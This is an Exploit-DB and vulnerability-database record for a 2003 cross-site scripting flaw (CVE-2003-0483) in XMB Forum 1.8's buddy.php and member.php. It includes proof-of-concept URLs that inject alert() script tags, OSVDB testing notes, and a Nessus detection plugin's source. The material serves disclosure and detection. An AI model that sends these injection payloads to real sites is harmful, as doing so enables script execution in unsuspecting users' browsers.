ID EDB-ID:22821 Type exploitdb Reporter Knight Commander Modified 2003-06-23T00:00:00
Description
XMB Forum 1.8 buddy.php action Parameter XSS. CVE-2003-0483. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/8013/info
XMB Forum has been reported prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sanitize user-supplied data.
An attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user.
http://www.example.com/XMBforum/buddy.php?action=<script>alert('XSS')</script>&buddy=<script>alert('XSS')</script>
{"id": "EDB-ID:22821", "type": "exploitdb", "bulletinFamily": "exploit", "title": "XMB Forum 1.8 buddy.php action Parameter XSS", "description": "XMB Forum 1.8 buddy.php action Parameter XSS. CVE-2003-0483. Webapps exploit for php platform", "published": "2003-06-23T00:00:00", "modified": "2003-06-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/22821/", "reporter": "Knight Commander", "references": [], "cvelist": ["CVE-2003-0483"], "lastseen": "2016-02-02T19:37:15", "viewCount": 4, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2016-02-02T19:37:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0483"]}, {"type": "osvdb", "idList": ["OSVDB:2191", "OSVDB:23073"]}, {"type": "nessus", "idList": ["XMB_XSS.NASL"]}], "modified": "2016-02-02T19:37:15", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://www.exploit-db.com/download/22821/", "sourceData": "source: http://www.securityfocus.com/bid/8013/info\r\n \r\nXMB Forum has been reported prone to multiple cross-site scripting and HTML-injection vulnerabilities because the application fails to sanitize user-supplied data.\r\n \r\nAn attacker may exploit any one of these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user.\r\n\r\nhttp://www.example.com/XMBforum/buddy.php?action=<script>alert('XSS')</script>&buddy=<script>alert('XSS')</script>", "osvdbidlist": ["23073"]}
{"cve": [{"lastseen": "2020-10-03T11:33:02", "description": "Cross-site scripting (XSS) vulnerabilities in XMB Forum 1.8 Partagium allow remote attackers to insert arbitrary script via (1) the member parameter to member.php or (2) the action parameter to buddy.php.", "edition": 3, "cvss3": {}, "published": "2003-08-07T04:00:00", "title": "CVE-2003-0483", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0483"], "modified": "2016-10-18T02:34:00", "cpe": ["cpe:/a:xmb_forum:xmb:1.8"], "id": "CVE-2003-0483", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0483", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:xmb_forum:xmb:1.8:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0483"], "edition": 1, "description": "## Vulnerability Description\nXMB Forum contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'member' variable upon submission to the 'member.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nUpgrade to version 1.8 Partagium Final SP1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nXMB Forum contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'member' variable upon submission to the 'member.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[target]/XMBforum/member.php?action=viewpro&member=admin<script>alert('Vulnerable')</script>\n## References:\n[Related OSVDB ID: 23073](https://vulners.com/osvdb/OSVDB:23073)\n[Nessus Plugin ID:11527](https://vulners.com/search?query=pluginID:11527)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-06/0163.html\nISS X-Force ID: 12396\nGeneric Informational URL: http://www.xmbforum.com/\n[CVE-2003-0483](https://vulners.com/cve/CVE-2003-0483)\nBugtraq ID: 8013\n", "modified": "2003-06-22T22:53:36", "published": "2003-06-22T22:53:36", "href": "https://vulners.com/osvdb/OSVDB:2191", "id": "OSVDB:2191", "type": "osvdb", "title": "XMB Forum member.php member Variable XSS", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:20", "bulletinFamily": "software", "cvelist": ["CVE-2003-0483"], "edition": 1, "description": "## Vulnerability Description\nXMB Forum contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'action' variable upon submission to the 'buddy.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nUpgrade to version 1.8 Partagium Final SP1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nXMB Forum contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'action' variable upon submission to the 'buddy.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[target]/XMBforum/buddy.php?action=<script>alert('Vulnerable')</script>&buddy=<script>alert('Vulnerable')</script>\n## References:\n[Related OSVDB ID: 2191](https://vulners.com/osvdb/OSVDB:2191)\n[Nessus Plugin ID:11527](https://vulners.com/search?query=pluginID:11527)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-06/0163.html\nISS X-Force ID: 12396\nGeneric Informational URL: http://www.xmbforum.com/\n[CVE-2003-0483](https://vulners.com/cve/CVE-2003-0483)\nBugtraq ID: 8013\n", "modified": "2003-06-22T22:53:36", "published": "2003-06-22T22:53:36", "href": "https://vulners.com/osvdb/OSVDB:23073", "id": "OSVDB:23073", "title": "XMB Forum buddy.php action Variable XSS", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T07:01:17", "description": "The remote host is running XMB Forum, a web forum written in PHP.\n\nThe version of XMB installed on the remote host is affected by several\ncross-site scripting issues.", "edition": 23, "published": "2003-04-08T00:00:00", "title": "XMB < 1.9.1 Multiple XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0483", "CVE-2002-0316", "CVE-2003-0375"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "XMB_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/11527", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11527);\n script_version (\"1.32\");\n\n script_cve_id(\"CVE-2002-0316\", \"CVE-2003-0375\", \"CVE-2003-0483\");\n script_bugtraq_id(4167, 4944, 8013);\n script_xref(name:\"EDB-ID\", value:\"21300\");\n\n script_name(english:\"XMB < 1.9.1 Multiple XSS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains several PHP scripts that are prone to\ncross-site scripting attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running XMB Forum, a web forum written in PHP.\n\nThe version of XMB installed on the remote host is affected by several\ncross-site scripting issues.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=bugtraq&m=101447886404876&w=2\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?27b51f87\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=bugtraq&m=105638720409307&w=2\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://marc.info/?l=bugtraq&m=105363936402228&w=2\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to XMB 1.9.1 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/04/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2003/06/23\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Determine if XMB forums is vulnerable to xss attack\");\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n script_dependencie(\"http_version.nasl\", \"cross_site_scripting.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80, embedded: 0);\nif(!can_host_php(port:port))exit(0);\nif(get_kb_item(string(\"www/\", port, \"/generic_xss\"))) exit(0);\n\n\nxss = '<script>x</script>';\nif (thorough_tests){\n dirs = list_uniq(make_list(\"/xmb\", \"/forum\", \"/forums\", \"/board\", cgi_dirs()));\n exploits = make_list(\n string('/forumdisplay.php?fid=21\">', xss),\n string('/buddy.php?action=', xss),\n string('/admin.php?action=viewpro&member=admin', xss)\n );\n} \nelse {\n dirs = make_list(cgi_dirs());\n exploits = make_list(\n string('/forumdisplay.php?fid=21\">', xss)\n );\n}\n\nforeach dir (dirs) {\n foreach exploit (exploits) {\n url = string(dir, exploit);\n r = http_send_recv3(method: \"GET\", item:url, port:port);\n if( isnull(r) ) exit(0);\n buf = r[2];\n if (\n (\n \"Powered by X M B\" >< buf ||\n \"Powered by XMB\" >< buf \n ) && \n xss >< buf\n ) {\n security_warning(port);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
